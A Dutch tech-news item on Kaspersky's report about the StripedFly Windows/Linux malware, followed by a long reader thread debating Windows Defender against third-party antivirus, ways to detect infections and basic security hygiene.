Onderzoekers Kaspersky waarschuwen voor geavanceerde Linux- en Windows-malware

Onderzoekers van Kaspersky Lab waarschuwen voor Windows- en Linux-malware met de naam StripedFly die al meer dan 1 miljoen systemen heeft geïnfecteerd sinds 2017. De malware zou modulair zijn en hierdoor veelzijdig ingezet kunnen worden.

De onderzoekers van Kaspersky dachten aanvankelijk dat StripedFly een cryptocurrency miner was, maar de malware is volgens hen veel complexer en kan ook heel wat meer taken aan. Ze vermelden bijvoorbeeld het uitvoeren van ddos-aanvallen, het installeren van andere malware en het uitschakelen van beveiligingssoftware van de gebruiker.

Volgens de onderzoekers kan de malware ook heel wat gegevens verzamelen. StripedFly probeert om de twee uur talloze gegevens over de gebruiker te verzamelen zoals bijvoorbeeld diens inloggegevens, wachtwoorden, adres, werkgever en functietitel. De malware zou ook in staat zijn om screenshots te nemen van een scherm en audio-opnamen te verkrijgen van de microfoon. Dit gebeurt volgens de onderzoekers dan ook zonder dat een gebruiker ervan op de hoogte is. StripedFly zou modulair zijn en kan verbinding maken met een externe server om nieuwe modules te downloaden die deze nieuwe toepassingen mogelijk maken.

Illustratieafbeelding code

Reacties (118)

Pazo

28 oktober 2023 12:40

Ik vraag mij altijd af bij het lezen van dit soort berichten of en hoe je zelf kan controleren of je besmet bent met malware. Ik gebruik op mijn systemen al jaren de standaard Windows Defender. Vroeger heb ik nog wel eens NOD32 gehad maar tegenwoordig is Defender eigenlijk ook prima.
Maar is dit soort malware uberhaupt te detecteren? Waarschijnlijk moet je altijd wachten totdat de Defender en andere virus/malware scan makers hun software hebben geupdate. Misschien ben ik al maanden besmet zonder dat ik dat dus zelf door heb? De vraag is dus hoe je jezelf hier tegen kunt wapenen.

henk717 @Pazo • 28 oktober 2023 15:12

Grootste kenmerk is toch echt of je antivirus aangetast is, draait die nog? Zijn er rare uitzonderingen gemaakt die je niet verwacht? Als die draait zou die normaal gesproken geupdate moeten kunnen worden om dergelijke virussen te herkennen. Dus om dat te voorkomen is de belangrijkste defentie van een virus om de antivirus uit te schakelen, zichzelf uit te zonderen of op een andere manier aan te tasten.

Bor Coördinator Frontpage Admins / FP Powermod

Kaspersky Lab
Beveiliging en antivirus
Malware

@Pazo • 28 oktober 2023 12:46

Misschien ben ik al maanden gesmet zonder dat ik dat dus zelf door heb?

Dat kan wanneer de malware zich al die tijd onder de radar heeft weten te bevinden. Malware en anti-malware blijft een kat- en muisspel. Zelf hanteer ik de stelregel dat het vaak beter is om de controle op malware aan een ander over te laten dan de producent van het OS met het idee van een soort heel basale multi layered defence.

The Zep Man

Beveiliging en antivirus
Networking en security
Malware

@Bor • 28 oktober 2023 12:49

Zelf hanteer ik de stelregel dat het vaak beter is om de controle op malware aan een ander over te laten dan de producent van het OS met het idee van een soort heel basale multi layered defence.

Is het idee hierachter inmiddels niet achterhaalt, gezien bijvoorbeeld Microsoft veel beter de ins en outs van Windows kent, en Windows Defender niet minder scoort dan de rest?

Bor Coördinator Frontpage Admins / FP Powermod

Kaspersky Lab
Beveiliging en antivirus
Malware

@The Zep Man • 28 oktober 2023 12:51

Het punt is wellicht minder effectief dan voorheen maar ik vind het nog steeds een aardige stelregel. Ik heb nu al vaker meegemaakt dat een 3rd party anti malware zaken wel stopt die Defender gewoon vrolijk doorlaat. Windows Defender scoort onder bepaalde omstandigheden behoorlijk minder dan de rest, bijvoorbeeld wanneer je geen gebruik maar van cloud gebaseerd scannen uit bv privacy overweging.

The Zep Man

Beveiliging en antivirus
Networking en security
Malware

@Bor • 28 oktober 2023 13:02

Ik heb nu al vaker meegemaakt dat een 3rd party anti malware zaken wel stopt die Defender gewoon vrolijk doorlaat.

Een vergelijkbare N=1: ik heb al vaker meegemaakt dat een 3rd party anti-malware 'zaken' zorgt voor BSOD's bij het opstarten waar een Defender dat in dezelfde situatie niet zou hebben gehad. Nu kan je daarbij debatteren of de schuld daarvan bij een third-party supplier of bij Microsoft ligt, maar aan die discussie heeft een benadeelde gebruiker niets. Die wilt gewoon een werkend systeem hebben, en de kans dat het blijft werken met enkel software van Microsoft is groter.

Windows Defender scoort onder bepaalde omstandigheden behoorlijk minder dan de rest, bijvoorbeeld wanneer je geen gebruik maar van cloud gebaseerd scannen uit bv privacy overweging.

En hoeveel gebruikers (en nog belangrijker: enterprises) bekommeren zich daarom?

Als je je aan Windows committeert en daarmee privacy opoffert, dan kan je net zo goed dat volledig doen voor een betere geïntegreerde oplossing met minder single point of failures. En dit komt van een Linuxgebruiker.

[Reactie gewijzigd door The Zep Man op 22 juli 2024 15:31]

Bor Coördinator Frontpage Admins / FP Powermod

Kaspersky Lab
Beveiliging en antivirus
Malware

@The Zep Man • 28 oktober 2023 13:06

Hier kan je eindeloze discussies over voeren met voor- en tegenstanders. Die N=1 is overigens op basis van zakelijke deployments met grote hoeveelheden endpoints. Helemaal N=1 zou ik het niet willen noemen. Dat een 3rd party scanner uit kan maken toont dit nieuwitem mede; ontdekt door Kaspersky en bij Microsoft nog niet bekend.

The Zep Man

Beveiliging en antivirus
Networking en security
Malware

@Bor • 28 oktober 2023 13:08

N = perspectief. Jij hebt een perspectief, ik heb dat ook (ieder =1).

Dat een 3rd party scanner uit kan maken toont dit nieuwitem mede; ontdekt door Kaspersky en bij Microsoft nog niet bekend.

En daar heb je weer een N=1, maar dan waarbij N iets nieuws ontdekt is. Hoeveel zaken heeft Microsoft als eerste herkend t.o.v. third-party scanners?

[Reactie gewijzigd door The Zep Man op 22 juli 2024 15:31]

Aldy @The Zep Man • 28 oktober 2023 15:09

En dit komt van een Linuxgebruiker.

Wat gebruik jij om dit probleem in Linux te ondervangen? Sinds kort gebruik ik weer Linux Mint naast mijn Windows 11.

Edit: Vraagteken vergeten.

[Reactie gewijzigd door Aldy op 22 juli 2024 15:31]

mcmlx @The Zep Man • 29 oktober 2023 09:36

Waarom moeten veel Linuxgebruikers altijd Windows afkraken ("Als je je aan Windows committeert en daarmee privacy opoffert")? Alsof privacy opofferen bij Linux niet het geval is (mocht je dat overigens denken dan heb je nog heel wat te leren).

Is het omdat Windows het beste OS is (gemeten naar aantal jaren bestaan en aantal gebruikers)? Of is het omdat een niet onaanzienlijk aantal Linux gebruikers een minderwaardigheidscomplex hebben, dit gezien hun kinderlijke reacties?

Waarom gewoon niet objectief blijven en iedereen in zijn waarde en hun keuzes laten? Wat denk je met dergelijke opmerkingen te bereiken?

timdv @mcmlx • 29 oktober 2023 23:54

De meeste Linux gebruikers (mijzelf inbegrepen), gaan zeker niet ontkennen dat Windows zijn sterktes heeft. De gebruiksvriendelijkheid van Windows heeft computergebruik net toegankelijk gemaakt voor het grote publiek, dit ongeacht hoe technisch onderlegd de eindegebruiker is. Voor mensen met meer tech knowhow, is Windows echter niet altijd de optimale keuze. Als embedded developer vind ik Windows veel te traag en buggy, vandaar dat ik altijd mijn eigen Linux laptop meeneem naar het werk.

Aangezien u ons allen vraagt objectief te blijven, zou ik wel enkele fouten uit uw redenering willen aankaarten. U redeneert dat "Windows het beste OS is", vanwege product-leeftijd en gebruikers-aantal. Echter is de Linux kernel voor het eerst uitgebracht in 1991, terwijl de Windows-NT kernel pas werd uitgebracht in 1993. Bijkomende zijn er ook meer Linux dan Windows gebruikers, mits we alle toestellen in rekening brengen die Linux op de achtergrond draaien (Android, Iphone, Mac, routers, WiFi AP's, smartwatches, Raspberry PI's, embedded systemen, servers, etc ...)! Bij deze komen we dus tot de objectieve conclusie, dat Linux > Windows!

PS: Betreffende privacy is Linux effectief beter dan Windows, mits men weet hoe Linux te gebruiken en welke distro.

mjtdevries @timdv • 30 oktober 2023 15:01

Als developer zou je toch moeten weten dat Macs geen Linux draaien?

timdv @mjtdevries • 31 oktober 2023 18:17

Natuurlijk besef ik dat Macs niet letterlijk Linux draaien!

Voor zover ik weet, is het eerder een BSD UNIX(-like) ripoff, waar ICT betweters en schijnexperts graag heel veel geld aan uitgeven. Vandaar wel de grote gelijkenis tussen Linux en Mac CLI commands. Zoals altijd, heeft Apple het weer gekopieerd van een ander!

Vond mijn vorige comment meer dan lang genoeg, had dus weinig zin hieromtrent nog een uitgebreide uitleg extra te typen. Bijkomende heeft mijn negativiteit omtrent Apple, de neiging Apple-fanboys wakker te schudden. Iet's wat ik liever had voorkomen...

[Reactie gewijzigd door timdv op 22 juli 2024 15:31]

laptopleon @mcmlx • 29 oktober 2023 12:56

Zijn opmerking staat in een context waaruit je kunt afleiden dat hij het niet bedoelt zoals jij het nu opvat. Je bent nu zelf degene die wéér het platgelopen Ajax/Feyenoord-oorlogspad inslaat.

jackyallstar @mcmlx • 30 oktober 2023 07:38

Hij had het er inderdaad niet meer bij hoeven te vermelden want dat was wel op te merken dat het om een Linux gebruiker ging gezien hij toch even een steekje moest geven naar iets en dus privacy koos, maar ik geloof dat hij hier wel Windows + Defender adviseert;)

Klauwhamer @Bor • 28 oktober 2023 23:11

Heb je iets van bronmateriaal als ondersteuning voor je statement ten aanzien van Windows Defender en behoorlijk minder scoren dan de rest onder bepaalde omstandigheden? Ik ben wel benieuwd naar die omstandigheden, wat je bedoel met "behoorlijk", en wat "de rest" is.

knobbeleend @Bor • 29 oktober 2023 09:18

Tja,wil niet lullig doen,maar als ik lees KASPERSKY LAB als je expertische dan kan ik je niet onafhankelijk en objectief noemen,toch?Ook trouwens op basis van je verdere reactie`s over dit onderwerp.Windows heeft na het debacel van windows 8 een speciale afdeling opgezet die zich alleen bezig houd met windows protection .https://www.microsoft.com/en-us/windows/comprehensive-security en https://www.businessnewsd...icer-keeping-company-safe.html deze man CEO was eerst werkzaam bij de CIA ,dus weet wel het 1 en ander.Zie dit niet als een persoonlijke aanval op jouw ofzo.Ik wil je alleen duidelijk maken dat de defender van nu,een goede implementatie is die al in je O.S zit..De tijd dat windows achterliep met beveiliging is allang voorbij.Je hebt nu b.v copilot, https://www.microsoft.com...icrosoft-security-copilot, iets wat ik zeker kan aanraden. Toevoeging;Je kan je Windows OS ook zelf zo instellen dat geen enkele app of .exe word geinstalleerd word(zonder expleciet jouw toestemming).Of maak een sandbox waarin je eerst kijkt wat iets is.

[Reactie gewijzigd door knobbeleend op 22 juli 2024 15:31]

PageFault @Bor • 30 oktober 2023 14:49

Wij van WC eend.

Vergeet niet dat Kasperky en andere anti-virus software zich al enige jaren ver onder Defender belanden in anti-virus tests....

Bor Coördinator Frontpage Admins / FP Powermod

Kaspersky Lab
Beveiliging en antivirus
Malware

@PageFault • 2 november 2023 19:24

Helemaal niet? Ik zie geen enkele test die dit laat zien.

CAPSLOCK2000

Beveiliging en antivirus
Networking en security
Kaspersky Lab

@The Zep Man • 28 oktober 2023 13:00

Is het idee hierachter inmiddels niet achterhaalt, gezien bijvoorbeeld Microsoft veel beter de ins en outs van Windows kent, en Windows Defender niet minder scoort dan de rest?

Het idee is fundamenteel correct. Een systeem kan zichzelf niet echt objectief controleren. Alles wat je in software inbouwt om een systeem te controleren is ook weer in software ongedaan te maken en/of te misleiden. Voor iedere maatregel die je bedenkt is er (in ieder geval in theorie) een tegenmaatregel te treffen, bv door de software in een VM te draaien. Daarbij maakt het overigens weinig uit wie de leverancier van de software is. Alles wat op de host zelf draait heeft z'n beperkingen.

Zolang is systeem nog niet gekraakt is kun je de verdediging van binnen uit voeren, maar als je niet meer zeker weet of systeem schoon is kun je dat alleen van af een ander systeem controleren. Helaas weet je dat nooit zeker. Daarom heb je altijd onafhankelijke systemen nodig die elkaar controleren.

Microsoft (en anderen) proberen daar wat aan te doen (zoals de TPM-chip en secure boot) maar om die systemen te gebruiken heb je weer software nodig waardoor je fundamenteel niet zeker kan zijn of de informatie klopt of dat alles één grote illusie is die wordt opgehangen door een slimme VM.

Je hebt ergens een onafhankelijk ankerpunt nodig waarvan je zeker weet dat het te vertrouwen is.

[Reactie gewijzigd door CAPSLOCK2000 op 22 juli 2024 15:31]

Sluuut @The Zep Man • 29 oktober 2023 09:04

Microsoft loopt voorop in cloud security als je daar andere zaken host, omdat ze dan diverse logs en dus verdachte acties aan elkaar kunnen koppelen. Dat neemt niet weg dat ze bijvoorbeeld op mail security niveau nog veel meer doorlaten dan de betere concurrenten.

Qua een onprem pc, is defender inmiddels een van de betere antimalware scanners.

Wat betreft de ingang voor malware blijf je meestal als mens zijnde de zwakte schakel. Bijna veen malware komt binnen via exploits, in de meeste gevallen zijn het malafide e-mails/website clicks.

[Reactie gewijzigd door Sluuut op 22 juli 2024 15:31]

Vogel666 @Bor • 30 oktober 2023 15:47

Wij van Kaspersky Lab adviseren 'Kaspersky Lab'!

Er is natuurlijk ook wat voor te zeggen dat de partij die een gat in zijn beveiliging over het hoofd heeft gezien, niet de beste partij is om vervolgens misbruik van datzelfde gat te zien. Ook het 'we-controleren-achteraf-wel-of-het-veilig-was'-beleid van MS heeft zijn voor en zijn tegens tov een EndPoint security systeem dat bijvoorbeeld al URL-filters erop na houdt.

Echter is MS weer in staat om naadloos op Windows aan te sluiten zonder al te veel performance verlies waar de 3rd parties een laag minder diep kunnen insteken plus een eigen framework moeten draaien. Beiden veroorzaken meer performance verlies dan strikt noodzakelijk.

Het hangt compleet van de security-behoefde en mogelijkheden af die een organisatie heeft. Heb je een security-team van 8 man om je endpoint security te beheren, dan heb je meer opties dan een standaard consument die hooguit 3 minuten in de week wil besteden aan security.
En als ik iedere dag wel een false positive tegen kom, dan klik ik na 6 weken zonder na te denken iedere melding gewoon door, zonder de benodigde zorgvuldigheid.
In mijn ogen leveren de 3rd party endpoint security pakketten pas echt meerwaarde wanneer je er echt serieus werk van maakt. Even 120 uur erin pompen...

[Reactie gewijzigd door Vogel666 op 22 juli 2024 15:31]

Frij5fd @Pazo • 28 oktober 2023 13:21

Met C't desinfect of vergelijkbare oplossingen kun je je besturingssysteem laten scannen terwijl het uit staat. Vereist is dan wel dat het opslagmedium waar dit systeem op geïnstalleerd is niet versleuteld is, wat bij diefstal weer een nadeel is

Bor Coördinator Frontpage Admins / FP Powermod

Kaspersky Lab
Beveiliging en antivirus
Malware

@Frij5fd • 28 oktober 2023 16:47

Een systeem scannen terwijl het uitstaat is niet mogelijk. Je kan hooguit een scan doen met een bootmedia terwijl je het hoofd OS niet opstart. Daarbij raad ik software aan van gerenommeerde bedrijven en een download uit een officiële bron ipv een "C't" tool (van het tijdschrift C't).

yvez

@Bor • 28 oktober 2023 19:09

Hij zegt toch duidelijk volgens mij: "kun je je besturingssysteem laten scannen terwijl _die_ uit staat." Lijkt me correct, hij bedoelt dat je dus buiten het OS kan scannen, en idd met een bootable medium.

fastedje @yvez • 29 oktober 2023 20:41

In de cloud kan dur dan weer prima: je kan een snapshot van je disk laten scannen terwijl je VM of container doordraait. Met containers is het nog wat simpeler: je kan nieuwe images eerst scannen voordat je ze uitvoert

Vogel666 @yvez • 30 oktober 2023 15:59

Lijkt mij dan weer totaal niet mogelijk.

Je drive is toch ge-encrypt om toegang tot de data buiten het OS om te voorkomen?!?
Althans dat mag ik hopen....

yvez

@Vogel666 • 31 oktober 2023 04:13

Lezen is een vak...maar goed; [..] mits de system drive onversleuteld is.

air2

@Bor • 29 oktober 2023 07:09

Die van het gerenommeerde tijdschrift c’t scant je pc met meerdere gerenommeerde virus scanners. Echt een aanrader!!!

Muncher @Frij5fd • 28 oktober 2023 13:25

C’t defect? Kan het niet vinden. Wat is dit voor software?

Frij5fd @Muncher • 28 oktober 2023 13:27

https://www.heise.de/news...-2023-ist-da-9059826.html

M. Schaap @Pazo • 28 oktober 2023 13:14

Ik gebruik naast Windows Defender ook de browserextensie NoScript.
Die voorkomt dat er bij het bezoek aan een website ongemerkt een script wordt gedraaid.
Het enige nadeel is dat je scripts op vertrouwde sites eerst handmatig moet whitelisten voordat de site fatsoenlijk werkt, maar die zitten in een bestand dat je ook kunt im- en exporten.
Behalve kwaadwillende scripts kan je hiermee ook nog commerciële rommel zoals popups blokkeren.

cricque @M. Schaap • 28 oktober 2023 20:06

Misschien eens gewoon Linux proberen dan ? Zoveel moeite doen ... ik kan mij echt niet inbeelden dat je dit bij elke site die je bezoekt moet gaan instellen

Puffino @cricque • 28 oktober 2023 20:42

Die zijn dus (deels) ook kwetsbaar, volgens de titel.

Linux maakt je niet immuun hè.

cricque @Puffino • 28 oktober 2023 21:22

Ja omdat ze ssh keys gaan proberen uit te lezen. En je maakt nooit ssh keys aan voor je root account op een systeem. Altijd een gebruiker, en die gebruiker kan niks. Dus je kan in het slechtste geval die gebruikers account gebruiken. Maar als je dus al om te beginnen geen Windows gebruikt, dan heb je ook geen ssh keys op je systeem staan waar de malware aankan.

[Reactie gewijzigd door cricque op 22 juli 2024 15:31]

aadje93 @cricque • 29 oktober 2023 02:00

tsja, en die gebruiker zal dus nooit sudo doen? Want een keyloggertje en we weten het wachtwoord ook naast de SSH keys

indigo79 @aadje93 • 29 oktober 2023 09:12

Ik gebruik daar een YubiKey voor, op mijn systemen is er geen enkele manier om zonder mijn YubiKey (of mijn backup YubiKey voor het geval er iets gebeurt met de eerste) als root in te loggen. Ook het LUKS wachtwoord voor schijfencryptie wordt alleen bij het configureren ingetypt en staat voor de rest op een blad papier in een safe; bij dagelijks gebruik is er een ander wachtwoord plus de YubiKey.
In noodgevallen kan ik uiteraard vanaf een ander medium opstarten en mijn schijven manueel ontsleutelen en de gegevens lezen, maar dat is op afstand toch al een veel grotere uitdaging.

Voor alle andere toepassingen (websites...) gebruik ik ook maximaal 2FA, met de YubiKey als het kan, met de authenticator app als het moet. Het maakt mij uiteraard niet immuun voor aanvallen, maar een heel aantal zaken (waaronder root toegang krijgen) is toch iets complexer dan een keyloggertje installeren.

brobro @cricque • 29 oktober 2023 00:06

'die gebruiker kan niks' - die gebruiker kan vaak van alles. En heeft ook allerlei gegevens op die computer staan.

nout77 @cricque • 30 oktober 2023 13:55

De infectie vindt vaak plaats via een besmette bijlage of website die je bezoekt. Via een zero day in de browser bijvoorbeeld. Vaak zit het virus dan in malafide (advertentie) scripts of plaatjes. Door die te blokkeren met een goede adblocker kun je al een groot deel van dit gevaar buiten de deur houden. Naast het up to date houden van de browser en adblock extensie uiteraard.

M. Schaap @cricque • 28 oktober 2023 21:13

De instellingen worden per site opgeslagen in een whitelist, dus het is vooral in het begin veel extra werk.
De lijst met "Per-site Permissions" kan je echter ook importeren van iemand, dan hoef je alleen nog maar incidenteel een niet bekende site permissie te geven.

Aldy @M. Schaap • 28 oktober 2023 15:12

Dat is ook vaak het probleem als je je beveiliging dichttimmert: soms wordt het onwerkbaar. Voor een bedrijf is zoiets niet te doen, privé is het je eigen verantwoording.

peke @Pazo • 28 oktober 2023 13:53

Ik denk dat je nooit zeker bent.
Wat sowieso slim is om frequent je OS te herinstalleren en je data in de cloud te bewaren indien mogelijk.
Als je bvb al je officetaken e.d. in de cloud doet en zesmaandelijks een herinstallatie van je OS (naar de nieuwste Fedora bvb), en je dan ook geen usb stickjes of externe drives gebruikt dan kan daar al geen malware op staan.
Ik heb geen idee eigenlijk of malware zich ook kan verschuilen in cloud storage?
Scant men daar de data en markeert men het als malware?
Het is dus eerder speculatie hier dat dit veiliger zou zijn.

Een ander goed idee is om software die je niet vertrouwd bvb te gebruiken binnen een virtual machine.
Malware kan zich dan wel verspreiden via shared directories, tenzij je ook weer werkt met cloud storage of geen storage nodig hebt. Of je scant die shared directories bij elke I/O operatie voor extra veiligheid.

MrMonkE @peke • 29 oktober 2023 06:05

re-install OS; the ultimate defeat

laptopleon @peke • 29 oktober 2023 13:08

Enerzijds kun je als gebruiker allerlei bestanden via de cloud overzetten, dus dat is ongetwijfeld een optie qua besmetten.

Anderzijds begreep ik dat een app in macOS niet zomaar bestanden kan bewaren in iCloud. Dit kwam ik tegen als reactie van de programmeur bij het onderzoeken waarom een spamfilter (dat een lijst van spam woorden bijhoudt) die lijst niet kan delen met instances van datzelfde spamfilter op andere apparaten van hetzelfde Apple-account.

fastedje @peke • 29 oktober 2023 20:46

Op Linux kan je heel makkelijk controleren of je geïnstalleerde packages nog helemaal correct zijn. Malware kan natuurlijk ook in andere directies staan, dus het is verstandig om je user dirs en tmp dirs te controleren en op te ruimen.

nullbyte @Pazo • 28 oktober 2023 15:03

of en hoe je zelf kan controleren of je besmet bent met malware.

Microsoft Sysinternal suite:
\\live.sysinternals.com@SSL\DavWWWRoot
procmon64
autoruns64
tcpview64
enz

ook kan je een b.v. een copy van het RAM maken met een tool als Volatility analyseren

anzaya @Pazo • 28 oktober 2023 17:34

HitManPro detecteerd deze ook nu.

SBAB @anzaya • 29 oktober 2023 15:33

Is heel lang geleden dat ik Hitman Pro nog gebruikt heb, ooit eens 13.000 malware van een computer verwijderd, de eigenares had de gewoonte op alle links te klikken in haar email client, ik ben de naam vergeten, maar het was met die kleurtjes en zo meer. Maar was Hitman Pro destijds niet plots zelf malware? Ik sta blijkbaar achter wat dat betreft? Zou heel interessant zijn het terug te kunnen gebruiken zo nu en dan, al heb ik de volledige suite van bitdefender op al mijn systemen.

anzaya @SBAB • 29 oktober 2023 15:39

al heb ik de volledige suite van bitdefender op al mijn systemen.

ESET is beter, vooral de instellingen zijn erg fijn te gebruiken, voor exclusions etc. in de firewall in ESET Internet Security.

Nee, HitManPro is geen malware hoor.

Vlizzjeffrey @Pazo • 28 oktober 2023 13:36

Om de 6 maanden een schone windows installatie, zou dat helpen tegen malware infecties?

wildhagen

Malware
Beveiliging en antivirus
Networking en security

@Vlizzjeffrey • 28 oktober 2023 14:52

Nee. Je kan immers de dag van die installatie alweer een nieuwe infectie oplopen, dan zit je dus 6 maanden lang met een geïnfecteerd systeem.

Een waterdichte oplossing is er niet, maar een aantal basiszaken moet je sowieso altijd doen: een goede malware scanner draaien, en dan wel continue, niet eens één keer per maand hem starten ofzo. Dat is gewoon een wassen neus, want als je besmet bent met een rootkit zal die nooit iets detecteren, ook al zit je PC vol met malware.

Verder een goede firewall installeren. En een beetje voorzichtig zijn met wat je doet op Internet, geen schimmige sites bezoeken, cracks downloaden (dat is een garantie voor malware...) etc etc.

Altijd je systeem uptodate houden met beveiligingspatches. Niet alleen voor het OS, maar ook met je software.

En als laatste ook niet werken met een account met full admin rechten, maar werk in plaats daarvan met een gelimiteerd account, en laat UAC zijn werk doen. Op die manier worden behoorlijk wat infecties al voorkomen.

En als preventie voor dataloss, zorg altijd dat je twee backups hebt, waarvan minimaal één niet via je PC bereikbaar is (offline dus).

[Reactie gewijzigd door wildhagen op 22 juli 2024 15:31]

aadje93 @wildhagen • 29 oktober 2023 02:02

waterdichte oplossing is er zeker, een officele DVD van MS kopen en geen lan kabel of wifi in je PC pluggen, dan kan je 100 jaar door zonder infectie zolang je er geen externe media in plugt

Niet voor niets is het op bedrijven steeds vaker gewenst gewoon PS2 hid te hebben en zo in bios gewoon de usb uit te zetten. Voorkomt een hoop ellende als stap 1 qua infecties met usb stickjes etc.

aikebah @aadje93 • 29 oktober 2023 10:03

Kom anders maar weinig hardware tegen waar überhaupt nog een PS2 aansluiting op zit... dus veel succes.

aadje93 @aikebah • 29 oktober 2023 17:30

consumenten hardware, nee zeker niet. Maar kijk is even naar hardware buiten de pricewatch en je vind nog gewoon seriele poorten + 2x ps2 met een reden. Het is degelijk, en werkt gewoon.

In mijn werkomgeving genoeg apparatuur die op seriele aansluitingen zit, en usb->serial werkt niet altijd even goed.

Niek H. @aadje93 • 29 oktober 2023 14:17

Je weet dat je Windows 11 niet eens meer (out of the box) zonder internetverbinding kan opzetten? Dit gaat dus al niet meer op =) Je moet een verbinding hebben voor je de PC kan gebruiken

Fireshade @Niek H. • 29 oktober 2023 14:26

Installeren kan gewoon via USB stick of gebrande dvd mbv media creation tool (op een andere pc).

Niek H. @Fireshade • 30 oktober 2023 09:28

Ja, en dan wil je gaan beginnen met opzetten en zal je zien dat je een internetverbinding MOET hebben voor je door kan gaan. Heb je de afgelopen tijd al eens nieuwe Windows 11 apparaten klaargemaakt? Dan zie je dat dat het geval is

Natuurlijk zijn er workarounds voor maar out of the box wordt er dus van je verwacht dat je een internetverbinding hebt voordat je een account mag instellen, anders mag je dus niet door. [insert rant over het forceren van Microsoft accounts]

[Reactie gewijzigd door Niek H. op 22 juli 2024 15:31]

Fireshade @Niek H. • 30 oktober 2023 14:57

Het is inderdaad wel een vervelende eis.
Wwat ik zeg blijft wel gewoon overeind: je kan installeren zonder internet, maar misschien niet "gewoon". Het vereist een command prompt actie tijdens de installatie, maar daarna is het geen probleem

SCS2 @aadje93 • 30 oktober 2023 18:40

Uhhh, dus een officiële DVD van MS om veilig te zijn ?

Mijn eerste virus kwam voordat er een netwerk was, dus voordat internet bestond, voordat er usb-sticks waren, voordat er CD's waren met illegale programma's.

Het stond op de (tegen schrijven beveiligde!) 5 1/4" floppy met MS DOS, die meegeleverd werd met de PC.....

Een kennis werkte bij een bedrijf, die één van de eerste AntiVirus programma hadden.
Zo wist ik het zeker en heb ik het van de floppy gehaald.

Later in de krant dat de master van het OS in een floppy-kopieer bedrijf besmet was geraakt.

Okay, misschien was die floppy van de pc-fabrikant en niet van MS zelf, ik weet het niet meer.
Maar toch...

aadje93 @SCS2 • 31 oktober 2023 00:28

"met de pc mee geleverd", dus een heel betoog om een gevalletje "niet orgineel" en dus blijft mijn punt staan, haal het bij het officiele kanaal, zij garanderen zelf dat het schoon is (althans, geen ongewenste backdoors, alleen de door bepaalde overheden toegestane backdoors)

Alxndr

@wildhagen • 29 oktober 2023 10:46

...moet je sowieso altijd doen

Sorry, maar ik vind wat je allemaal noemt een enorme overkill.

Prima procedures hoor, daar niet van, maar met enkel windows defender red ik het al tien jaar prima. En dat terwijl ik voor mn werk iedereen dag op genoeg schimmige sites kom.

Wat volgens mij het meeste scheelt is een goede adblocker en geen illegale/gekraakte software downloaden.

Ulysses @Alxndr • 29 oktober 2023 12:40

Helemaal prima ook hoor. Pragmatisch bekeken is een gemiddelde gebruiker - en ja, dat zijn de meeste Tweakers óók gewoon - totaal oninteressant om op afstand bestuurbare super malware mee te draaien. Ik bedoel, Mark Rutte's Laptop - Die heeft een serieus aanval's potentiëel ... Of iemand hooggeplaatst in een bedrijf natuurlijk, en daarom zijn bedrijven ook beveiligd door de beheerders die ook wel een volledig beleid uitrollen.
Voor je huis-tuin-en-keuken-PC echter, is het allemaal totaal irrelevant. In de regel word je ook niet gehackt voor een paar honderd euro op je bank, dan mag je toch echt wel eerst serieus cryptomiljonair zijn om interessant te zijn. En ga zo maar door.
Maar hier op Tweakers denken nogal veel bezoekers dat ze minstens even interessant zijn. Valt tegen. Trust me.

nehal3m @Ulysses • 29 oktober 2023 12:58

Malware kijkt helemaal niet naar of je interessant bent om te hacken, als het mogelijk is doet het dat gewoon. De uitbaters kijken achteraf wel of ze iets bruikbaars vinden.

Ulysses @nehal3m • 29 oktober 2023 13:09

In alle andere gevallen is het 99% van de tijd voldoende om gewoon basale beveiliging aan te brengen zoals AV via MS zelf bijvoorbeeld, de firewall niet uit te schakelen en natuurlijk vooral ook niet op shady-sites je gewenste warez vandaan te lurken...
Ik werk zelf ook al jaren met alleen de basisbeveiliging die in Windows zit, sinds ik een zakelijke aansluiting heb van ziggo heb ik daar dan een daarbij aangeboden Safe-Online Pakket bij opgezet - want ja, daar betaal ik toch voor. Maar het belangrijkste is digitale hygiëne te handhaven. Wat dan dus in bedrijven door beleid een beetje afgedwongen word.

kozue @Alxndr • 29 oktober 2023 12:00

Wat is er dan overkill van wat hij opnoemt? Onder een user acccount draaien ipv root/admin? Een firewall draaien? Patches uptodate houden? Geen schimmige sites bezoeken? Ik lees er niks overkill in, of iets wat veel moeite kost. Het zijn bijna allemaal standaard instellingen van ieder modern OS.

Alxndr

@EchoWhiskey • 29 oktober 2023 15:30

Ik kijk er niet eens naar, jij wel? Ik ervaar geen problemen, dus ik heb geen problemen.

onwetendheid is zaligheid zullen we maar zeggen.

zenlord @Vlizzjeffrey • 28 oktober 2023 14:12

Misschien wel, maar ik herinner mij nog een tijd dat je de installatie-cd van Windows XP met SP2 moest patchen om een veilige clean install te kunnen uitvoeren. Zonder dat SP was je nieuwe installatie binnen het kwartier opnieuw geïnfecteerd (met het "I love you"-virus?).
Ik mis in dit bericht wat de aanvalsvector is van deze StripedFly - nu moet ik alsnog zelf gaan onderzoeken of mijn systemen verder onderzoek nodig hebben of niet.

StuNNeD @zenlord • 28 oktober 2023 16:14

Was de goeie oude MSBlaster als ik het me goed herinner...

zetje01 @StuNNeD • 28 oktober 2023 22:29

Juist!
Het "i love you" virus werd per email verspreid.
(voornamelijk via werk-computers met grote adressenboekjes (en geile collega's)

Amadeus1966 @zetje01 • 29 oktober 2023 12:23

Aka Melissa virus.

goarilla @zenlord • 28 oktober 2023 16:06

Dat was ook wel enkel zo als je direct verbonden was met het Internet met een kabelmodem ofzo. Dus zonder NAT/router ding.

kozue @Vlizzjeffrey • 29 oktober 2023 12:01

Wie gaat er serieus iedere paar maanden z’n computer opnieuw installeren? Normale mensen hebben zo’n ding om *mee* te werken, niet om *aan* te werken.

aadje93 @tweazer • 29 oktober 2023 17:31

nee, een westers bedrijf uit de US heeft geen backdoors etc....

tweazer @aadje93 • 31 oktober 2023 11:16

Tja, maar wel issues (uit het verleden ??) https://en.wikipedia.org/...f_Russian_government_ties

AIDE op linux is wel de oplossing, maar kennelijk heeft een groupy een andere mening en word ik ge-downvote

[Reactie gewijzigd door tweazer op 22 juli 2024 15:31]

Big Womly @Pazo • 28 oktober 2023 14:11

Zoals vaker is preventie nog de beste beveiliging. Zolag je je beperkt tot bronnen die je vertrouwd beperk je het risico al.

mphilipp @Pazo • 28 oktober 2023 19:01

